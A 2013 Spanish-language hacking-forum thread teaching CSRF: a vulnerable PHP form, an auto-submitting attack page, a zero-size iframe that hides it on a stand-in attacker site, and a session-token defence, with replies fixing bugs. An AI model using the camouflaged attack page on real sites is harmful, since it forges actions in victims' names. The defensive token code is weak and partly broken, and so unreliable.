comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Ataques CSRF (Cross site request forgery)

  • 11 Respuestas
  • 5651 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado M5f3r0

  • *
  • Underc0der
  • Mensajes: 44
  • Actividad:
    0%
  • Reputación 0
  • Leer la firma.
    • Ver Perfil
  • Skype: m5f3r0
« en: Septiembre 03, 2013, 08:15:10 pm »
Ejemplo de ataque CSRF

Un ataque CSRF/XSRF o Cross site request forgery vendría siendo un exploit o vulnerabilidad la cúal se da en aplicaciones web en la que el usuario víctima realiza ciertas peticiones falsificadas en aplicaciones web vulnerables, la víctima al abrir la CSRF automáticamente lograra ejecutar u/o modificar registros sin su intención.

Para poder llevarse a cabo un ataque CSRF se debe hacer uso de la ingeniería social, con la cúal podamos lograr que el usuario víctima acceda a nuestra página la cúal debe tener el csrf oculto, está se encargara de ejecutar el CSRF sin que el usuario víctima se pueda dar cuenta.

Código vulnerable

Un código vulnerable podría ser el siguiente:

pagina.html :

Código: HTML5
  1. <No tienes permisos para ver links. Registrate o Entra con tu cuenta action="process.php" method="POST">
  2. Texto: <No tienes permisos para ver links. Registrate o Entra con tu cuenta type="text" name="text" /><No tienes permisos para ver links. Registrate o Entra con tu cuenta><No tienes permisos para ver links. Registrate o Entra con tu cuenta>
  3. <No tienes permisos para ver links. Registrate o Entra con tu cuenta type="submit" />
  4. </No tienes permisos para ver links. Registrate o Entra con tu cuenta>

Como pueden observar, no hacemos ningún envío de token para tener una identificación única. Con lo cúal, nuestro formulario es vulnerable a ataques CSRF. En este caso, solo tenemos un simple formulario que no almacena ni registra nada, pero imagínense uno que sí. Sería de grave peligro.

process.php :

Código: PHP
  1. <?php
  2. if(No tienes permisos para ver links. Registrate o Entra con tu cuenta($_POST['text']) && !No tienes permisos para ver links. Registrate o Entra con tu cuenta($_POST['text'])){
  3.  echo "Hola";
  4. }
  5. else{
  6. echo "Error";
  7. }
  8. ?>

Este es solo un simple proceso, el cúal verifica si el input de texto "text" no este vacío. si es así, lanza un mensaje diciendo error.

Preparando nuestro código CSRF de ataque

Pues para preparar el escenario de ataque, el atacante necesita tener conocimientos en la programación web, ya sea PHP, JS u HTML. Aquí les presento una estructura de código en php la cúal he creado especialmente para el formulario anterior vulnerable:

Código: PHP
  1.  
  2. <?php
  3.  
  4. $urlvulnerable = "localhost"; // Link del sitio
  5. $valor = "M5f3r0 was here!"; // Valor a modificar
  6.  
  7. echo '<form action="'.$urlvulnerable.'/process.php" name="csrf" method="POST">'; // Ingresamos la url del formulario a ejecutar
  8. echo '<input type="hidden" value="'.$valor.'" name="text" />'; // Ingresamos el nombre del input y el valor a ingresar.
  9. echo '<body onload="document.csrf.submit();">'; // Ejecutamos el documento con el script "document.csrf.submit();"
  10. echo '</form>';
  11.  
  12. ?>
  13.  

En este código simple, solamente ejecutamos el valor ingresado en el csrf en la página web vulnerable, identificándonos como nuestro usuario víctima.

Camuflando nuestra CSRF

Existe un método para evitar que nuestro CSRF de ataque se note sospechoso, sería camuflando nuestro código de ataque mediante el uso de HTML u algún otro lenguaje de programación web, tal como JS, jQuery, HTML, o tal vez un simple index en el que camuflamos nuestro código mediante el uso de un <iframe> en html.

Un ejemplo sería el siguiente, en el que camuflamos nuestro CSRF en una index con un iframe:

Código: HTML5
  1. <No tienes permisos para ver links. Registrate o Entra con tu cuenta>
  2. <No tienes permisos para ver links. Registrate o Entra con tu cuenta><No tienes permisos para ver links. Registrate o Entra con tu cuenta>Bienvenid@</No tienes permisos para ver links. Registrate o Entra con tu cuenta></No tienes permisos para ver links. Registrate o Entra con tu cuenta>
  3. <No tienes permisos para ver links. Registrate o Entra con tu cuenta>
  4.  
  5. <No tienes permisos para ver links. Registrate o Entra con tu cuenta>Bienvenid@ a mi sitio web :)</No tienes permisos para ver links. Registrate o Entra con tu cuenta>
  6.  
  7. <No tienes permisos para ver links. Registrate o Entra con tu cuenta src="http://websitedelatacante.com/csrfoculto.php" width=0% height=0% />
  8.  
  9. </No tienes permisos para ver links. Registrate o Entra con tu cuenta>
  10. </No tienes permisos para ver links. Registrate o Entra con tu cuenta>
  11.  

Aunque es muy claro que este se nota muy sospechoso, es cuestión de saber HTML5 y montar una index común y corriente, para luego enviarsela a la víctima.

Defensa

Para poder defendernos de este tipo de ataques, yo recomiendo hacer uso de algún envío de un token como una sesión en php. Haciendo uso de la función session_start() , el hash md5() u sha1() para la encriptación, uniqid() para un identificador único y rand() para dar un entero aleatorio. Ejemplo:

token.php :

Código: PHP
  1. <?php
  2.  
  3. No tienes permisos para ver links. Registrate o Entra con tu cuenta();
  4.  
  5. ?>
  6. <html>
  7.    <head><title>Hola</title></head>
  8.    <meta charset="utf-8">
  9.    <body>
  10.         <?php $_SESSION["envio_token"] = No tienes permisos para ver links. Registrate o Entra con tu cuenta(No tienes permisos para ver links. Registrate o Entra con tu cuenta(No tienes permisos para ver links. Registrate o Entra con tu cuenta(), TRUE));
  11.         echo '<form action="process.php?envio_token='.$_SESSION["envio_token"].'" method="post">';
  12.                  echo 'Ingrese algún texto: <input type="text" name="text"><br><br>';
  13.                                  echo '<input type="submit" value="Ejecutar">';
  14.         echo '</form>';
  15.                 ?>
  16.    </body>
  17. </html>
  18.  

Y cómo pueden observar, tenemos un identificador único y un número aleatorio cifrado en sha1 como sesión. Y luego ejecutamos el token por el método GET.

process.php :

Código: PHP
  1. <html>
  2.    <head>
  3.    <title>Proceso</title>
  4.    </head>
  5.    <body>
  6.         <?php
  7.              if($_GET["envio_token"] == $_SESSION["envio_token"]){       
  8.                          echo 'Se ha ejecutado el token correctamente';
  9.     }
  10.         else{
  11.     echo 'Error';
  12.             }
  13.        ?>
  14.    </body>
  15. </html>
  16.  

Y en este proceso, comprobamos que el token que se envío por el método GET es el mismo de la sesión que tenemos iniciada. Si es así, muestra un mensaje avisando que todo se ejecuto correctamente.

Bueno, eso ha sido todo. Espero les haya gustado, si me equivoco en algo corrijanme y actualizo el post ;D.

Un saludo, M5f3r0.
« Última modificación: Septiembre 09, 2013, 04:15:32 pm por M5f3r0 »
A veces, observo mi pasado y me arrepiento en la actualidad de todo lo que llegue a perder y olvidar por como me veía la sociedad, nunca dejes que las opiniones de los demás te lleguen a afectar moralmente hasta el punto en que dejes de hacer lo que más te apasiona, saludos! (msj escrito en el 2016)

Desconectado Réplica1

  • *
  • Underc0der
  • Mensajes: 35
  • Actividad:
    0%
  • Reputación 0
  • ... está historia se acabó.
    • Ver Perfil
    • @Pekador - Twitter
« Respuesta #1 en: Septiembre 03, 2013, 09:05:32 pm »
Muy bueno bro, se agradece!

Saludos.
 

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5394
  • Actividad:
    35%
  • Reputación 31
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #2 en: Septiembre 03, 2013, 09:43:24 pm »
Que excelente aporte! Se merece que sea posteado en el blog de underc0de!
Vere si lo hago en un rato! (por supuesto que con tus creditos!)

Muy buen trabajo bro! Da gusto leer aportes asi!

Saludos!
ANTRAX


Desconectado arthusu

  • *
  • Underc0der
  • Mensajes: 546
  • Actividad:
    8.33%
  • Reputación 2
  • Yo solo se que no se nada - Socrátes
    • Ver Perfil
    • Arthusu BLOG
  • Skype: arthusuxD
« Respuesta #3 en: Septiembre 03, 2013, 10:25:11 pm »
Citar
Bueno, eso ha sido todo. Espero les haya gustado, si me equivoco en algo corrijanme y actualizo el post

aca:

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
<?php
 
$urlvulnerable 
"localhost"// Link del sitio
$valor "M5f3r0 was here!"// Valor a modificar
 
echo '<form action="'.$urlvulnerable.'/process.php" method="POST" />'// Ingresamos la url del formulario a ejecutar
echo '<input type="hidden" value="'.$valor.'" name="text" />'// Ingresamos el nombre del input y el valor a ingresar.
echo '<body onload="document.csrf.submit();">'// Ejecutamos el documento con el script "document.csrf.submit();"
echo '</form>
 
?>

te falto ponerle el nombre al form si no no se ejecutaria este javascript: document.csrf.submit() osea solo te falto la etiqueta name="csrf" en
<form action="'.$urlvulnerable.'/process.php" method="POST" name="csrf"> ademas no debes cerrar / al principio es decir:
<form action="'.$urlvulnerable.'/process.php" method="POST" /> por que ya esta siendo cerrada en </form>, bueno bro nada mas eso solo comente por que al final dijistes espero que no me lo tomes a mal ya sabes que yo te estimo mucho bro un saludo :P

Desconectado M5f3r0

  • *
  • Underc0der
  • Mensajes: 44
  • Actividad:
    0%
  • Reputación 0
  • Leer la firma.
    • Ver Perfil
  • Skype: m5f3r0
« Respuesta #4 en: Septiembre 03, 2013, 10:40:06 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Citar
Bueno, eso ha sido todo. Espero les haya gustado, si me equivoco en algo corrijanme y actualizo el post

aca:

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
<?php
 
$urlvulnerable 
"localhost"// Link del sitio
$valor "M5f3r0 was here!"// Valor a modificar
 
echo '<form action="'.$urlvulnerable.'/process.php" method="POST" />'// Ingresamos la url del formulario a ejecutar
echo '<input type="hidden" value="'.$valor.'" name="text" />'// Ingresamos el nombre del input y el valor a ingresar.
echo '<body onload="document.csrf.submit();">'// Ejecutamos el documento con el script "document.csrf.submit();"
echo '</form>
 
?>

te falto ponerle el nombre al form si no no se ejecutaria este javascript: document.csrf.submit() osea solo te falto la etiqueta name="csrf" en
<form action="'.$urlvulnerable.'/process.php" method="POST" name="csrf"> ademas no debes cerrar / al principio es decir:
<form action="'.$urlvulnerable.'/process.php" method="POST" /> por que ya esta siendo cerrada en </form>, bueno bro nada mas eso solo comente por que al final dijistes espero que no me lo tomes a mal ya sabes que yo te estimo mucho bro un saludo :P

LOL, es cierto, me equivoque, gracias bro. Actualizado!

Un saludo.
A veces, observo mi pasado y me arrepiento en la actualidad de todo lo que llegue a perder y olvidar por como me veía la sociedad, nunca dejes que las opiniones de los demás te lleguen a afectar moralmente hasta el punto en que dejes de hacer lo que más te apasiona, saludos! (msj escrito en el 2016)

Desconectado HckDrk

  • *
  • Underc0der
  • Mensajes: 55
  • Actividad:
    0%
  • Reputación 0
  • http://127.0.0.1
    • Ver Perfil
    • HckDrk
« Respuesta #5 en: Septiembre 04, 2013, 01:45:37 am »
2 errores mas! XD

a cada archivo le debes poner session_start() para crear o activar las sessiones como nuestro amigo php.net nos dice XD, sino no nos funcionaran las sessiones! y no veo que se lo hayas puesto a los archivos xD

ademas aca

Cita de: php
echo '<form action="process.php?token='.$_SESSION["envio_token"].'" method="post">';

la variable que creas se llama token y aca

Cita de: php
if($_GET["envio_token"] == $_SESSION["envio_token"]){ 

aqui tratas de obtener por get la variable "envio_token", por logica el script funcionara mal
acaso no probaste tus script bro? :/
los probé y no funcionaban xD


Aqui los que si me funcionaron

Código: PHP
  1. <html>
  2.    <head><title>Hola</title></head>
  3.    <meta charset="utf-8">
  4.    <body>
  5.         <?php
  6.                 No tienes permisos para ver links. Registrate o Entra con tu cuenta();
  7.                 $_SESSION["envio_token"] = No tienes permisos para ver links. Registrate o Entra con tu cuenta(No tienes permisos para ver links. Registrate o Entra con tu cuenta(No tienes permisos para ver links. Registrate o Entra con tu cuenta(), TRUE));
  8.         echo '<form action="process.php?token='.$_SESSION["envio_token"].'" method="post">';
  9.                  echo 'Ingrese algún texto: <input type="text" name="text"><br><br>';
  10.                                  echo '<input type="submit" value="Ejecutar">';
  11.         echo '</form>';
  12.                 ?>
  13.    </body>
  14. </html>

Código: PHP
  1. <html>
  2.    <head>
  3.    <title>Proceso</title>
  4.    </head>
  5.    <body>
  6.         <?php
  7.                 No tienes permisos para ver links. Registrate o Entra con tu cuenta();
  8.                
  9.              if($_GET["token"] == $_SESSION["envio_token"]){      
  10.                          echo 'Se ha ejecutado el token correctamente';
  11.     }
  12.         else{
  13.     echo 'Error';
  14.             }
  15.        ?>
  16.    </body>
  17. </html>
« Última modificación: Septiembre 04, 2013, 01:56:14 am por HckDrk »

Desconectado M5f3r0

  • *
  • Underc0der
  • Mensajes: 44
  • Actividad:
    0%
  • Reputación 0
  • Leer la firma.
    • Ver Perfil
  • Skype: m5f3r0
« Respuesta #6 en: Septiembre 04, 2013, 01:14:27 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
2 errores mas! XD

a cada archivo le debes poner session_start() para crear o activar las sessiones como nuestro amigo php.net nos dice XD, sino no nos funcionaran las sessiones! y no veo que se lo hayas puesto a los archivos xD

ademas aca

Cita de: php
echo '<form action="process.php?token='.$_SESSION["envio_token"].'" method="post">';

la variable que creas se llama token y aca

Cita de: php
if($_GET["envio_token"] == $_SESSION["envio_token"]){ 

aqui tratas de obtener por get la variable "envio_token", por logica el script funcionara mal
acaso no probaste tus script bro? :/
los probé y no funcionaban xD


Aqui los que si me funcionaron

Código: PHP
  1. <html>
  2.    <head><title>Hola</title></head>
  3.    <meta charset="utf-8">
  4.    <body>
  5.         <?php
  6.                 No tienes permisos para ver links. Registrate o Entra con tu cuenta();
  7.                 $_SESSION["envio_token"] = No tienes permisos para ver links. Registrate o Entra con tu cuenta(No tienes permisos para ver links. Registrate o Entra con tu cuenta(No tienes permisos para ver links. Registrate o Entra con tu cuenta(), TRUE));
  8.         echo '<form action="process.php?token='.$_SESSION["envio_token"].'" method="post">';
  9.                  echo 'Ingrese algún texto: <input type="text" name="text"><br><br>';
  10.                                  echo '<input type="submit" value="Ejecutar">';
  11.         echo '</form>';
  12.                 ?>
  13.    </body>
  14. </html>

Código: PHP
  1. <html>
  2.    <head>
  3.    <title>Proceso</title>
  4.    </head>
  5.    <body>
  6.         <?php
  7.                 No tienes permisos para ver links. Registrate o Entra con tu cuenta();
  8.                
  9.              if($_GET["token"] == $_SESSION["envio_token"]){      
  10.                          echo 'Se ha ejecutado el token correctamente';
  11.     }
  12.         else{
  13.     echo 'Error';
  14.             }
  15.        ?>
  16.    </body>
  17. </html>

A mí me funcionaron perfectamente con mi configuración. Pero de todas formas si tienes razón ya está actualizado.

Saludos.
A veces, observo mi pasado y me arrepiento en la actualidad de todo lo que llegue a perder y olvidar por como me veía la sociedad, nunca dejes que las opiniones de los demás te lleguen a afectar moralmente hasta el punto en que dejes de hacer lo que más te apasiona, saludos! (msj escrito en el 2016)

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5394
  • Actividad:
    35%
  • Reputación 31
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #7 en: Septiembre 04, 2013, 02:24:19 pm »
Lamentablemente no pude poner todo el post completo ya que google no permite añadir la etiqueta iframe por serguridad, pero puse gran parte del post y un link para continuar leyendolo aca en el foro

No tienes permisos para ver links. Registrate o Entra con tu cuenta

Muchas gracias M5f3r0 por tu post! esta muy bueno!!

Saludos!
ANTRAX


Desconectado arthusu

  • *
  • Underc0der
  • Mensajes: 546
  • Actividad:
    8.33%
  • Reputación 2
  • Yo solo se que no se nada - Socrátes
    • Ver Perfil
    • Arthusu BLOG
  • Skype: arthusuxD
« Respuesta #8 en: Septiembre 05, 2013, 12:24:21 am »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
No tienes permisos para ver links. Registrate o Entra con tu cuenta
2 errores mas! XD

a cada archivo le debes poner session_start() para crear o activar las sessiones como nuestro amigo php.net nos dice XD, sino no nos funcionaran las sessiones! y no veo que se lo hayas puesto a los archivos xD

ademas aca

Cita de: php
echo '<form action="process.php?token='.$_SESSION["envio_token"].'" method="post">';

la variable que creas se llama token y aca

Cita de: php
if($_GET["envio_token"] == $_SESSION["envio_token"]){ 

aqui tratas de obtener por get la variable "envio_token", por logica el script funcionara mal
acaso no probaste tus script bro? :/
los probé y no funcionaban xD


Aqui los que si me funcionaron

Código: PHP
  1. <html>
  2.    <head><title>Hola</title></head>
  3.    <meta charset="utf-8">
  4.    <body>
  5.         <?php
  6.                 No tienes permisos para ver links. Registrate o Entra con tu cuenta();
  7.                 $_SESSION["envio_token"] = No tienes permisos para ver links. Registrate o Entra con tu cuenta(No tienes permisos para ver links. Registrate o Entra con tu cuenta(No tienes permisos para ver links. Registrate o Entra con tu cuenta(), TRUE));
  8.         echo '<form action="process.php?token='.$_SESSION["envio_token"].'" method="post">';
  9.                  echo 'Ingrese algún texto: <input type="text" name="text"><br><br>';
  10.                                  echo '<input type="submit" value="Ejecutar">';
  11.         echo '</form>';
  12.                 ?>
  13.    </body>
  14. </html>

Código: PHP
  1. <html>
  2.    <head>
  3.    <title>Proceso</title>
  4.    </head>
  5.    <body>
  6.         <?php
  7.                 No tienes permisos para ver links. Registrate o Entra con tu cuenta();
  8.                
  9.              if($_GET["token"] == $_SESSION["envio_token"]){      
  10.                          echo 'Se ha ejecutado el token correctamente';
  11.     }
  12.         else{
  13.     echo 'Error';
  14.             }
  15.        ?>
  16.    </body>
  17. </html>

A mí me funcionaron perfectamente con mi configuración. Pero de todas formas si tienes razón ya está actualizado.

Saludos.

De hecho si se debe iniciar con session_start() pero como mufero dice tambien puedes no hacerlo especificando en el php.ini session.auto_start = 1 con el valor 1 (true) :p
Asi que en realidad los dos tienen razon, salu2 :P

Desconectado choque

  • *
  • Underc0der
  • Mensajes: 1
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #9 en: Septiembre 05, 2013, 06:08:30 pm »
Gracias por tu mensaje, Arthusu. Usted ha explicado bien el asunto.

Desconectado stakewinner00

  • *
  • Underc0der
  • Mensajes: 31
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #10 en: Septiembre 09, 2013, 09:40:05 am »
Saludos.

En
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
     
    <?php
     
    $urlvulnerable 
"localhost"// Link del sitio
    
$valor "M5f3r0 was here!"// Valor a modificar
     
   
[b] echo '<form action="'.$urlvulnerable.'/process.php" name="csrf" method="POST">'// Ingresamos la url del formulario a ejecutar[/b]
    
echo '<input type="hidden" value="'.$valor.'" name="text" />'// Ingresamos el nombre del input y el valor a ingresar.
    
echo '<body onload="document.csrf.submit();">'// Ejecutamos el documento con el script "document.csrf.submit();"
    
echo '</form>';
     
    
?>

     
Falta poner http:// delante por que sino lo coge como una carpeta y entonces va a localhost/localhost/process.php por lo que quedaría así echo '<form action="'http://.$urlvulnerable.'/process.php" name="csrf" method="POST">'; // Ingresamos la url del formulario a ejecutar

otra cosa, probe lo del post y no puedo hacer que el "exploit" funcione.

Desconectado M5f3r0

  • *
  • Underc0der
  • Mensajes: 44
  • Actividad:
    0%
  • Reputación 0
  • Leer la firma.
    • Ver Perfil
  • Skype: m5f3r0
« Respuesta #11 en: Septiembre 09, 2013, 03:48:08 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Saludos.

En
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
     
    <?php
     
    $urlvulnerable 
"localhost"// Link del sitio
    
$valor "M5f3r0 was here!"// Valor a modificar
     
   
[b] echo '<form action="'.$urlvulnerable.'/process.php" name="csrf" method="POST">'// Ingresamos la url del formulario a ejecutar[/b]
    
echo '<input type="hidden" value="'.$valor.'" name="text" />'// Ingresamos el nombre del input y el valor a ingresar.
    
echo '<body onload="document.csrf.submit();">'// Ejecutamos el documento con el script "document.csrf.submit();"
    
echo '</form>';
     
    
?>

     
Falta poner http:// delante por que sino lo coge como una carpeta y entonces va a localhost/localhost/process.php por lo que quedaría así echo '<form action="'http://.$urlvulnerable.'/process.php" name="csrf" method="POST">'; // Ingresamos la url del formulario a ejecutar

otra cosa, probe lo del post y no puedo hacer que el "exploit" funcione.

No sé porque dicen que no les funciona, con mi configuración a mi me corría perfectamente sin error alguno.

Saludos.
A veces, observo mi pasado y me arrepiento en la actualidad de todo lo que llegue a perder y olvidar por como me veía la sociedad, nunca dejes que las opiniones de los demás te lleguen a afectar moralmente hasta el punto en que dejes de hacer lo que más te apasiona, saludos! (msj escrito en el 2016)

 

¿Te gustó el post? COMPARTILO!



Administrador Gráfico de Cyber Ataques para Metasploit

Iniciado por staRgan

Respuestas: 2
Vistas: 1883
Último mensaje Junio 26, 2011, 11:58:52 pm
por Ch05piN
Seguridad en una WEB (Evitando Ataques de XSS,Sqli,Rfi,Lfi,dos,)

Iniciado por REC

Respuestas: 0
Vistas: 3181
Último mensaje Mayo 29, 2012, 01:57:22 pm
por REC
Ataques a Bases de Datos: SQL Injection

Iniciado por Expermicid

Respuestas: 3
Vistas: 2277
Último mensaje Diciembre 02, 2013, 06:55:53 pm
por 0zacBin
Ataques a aplicaciones web

Iniciado por Expermicid

Respuestas: 3
Vistas: 2203
Último mensaje Diciembre 02, 2013, 07:07:08 pm
por 0zacBin
[Tutorial] Vulnerabilidad CSRF By ShadinessDark [Colaboracion de Zero Bits]

Iniciado por dracko.rx

Respuestas: 0
Vistas: 1849
Último mensaje Febrero 24, 2010, 03:24:51 pm
por dracko.rx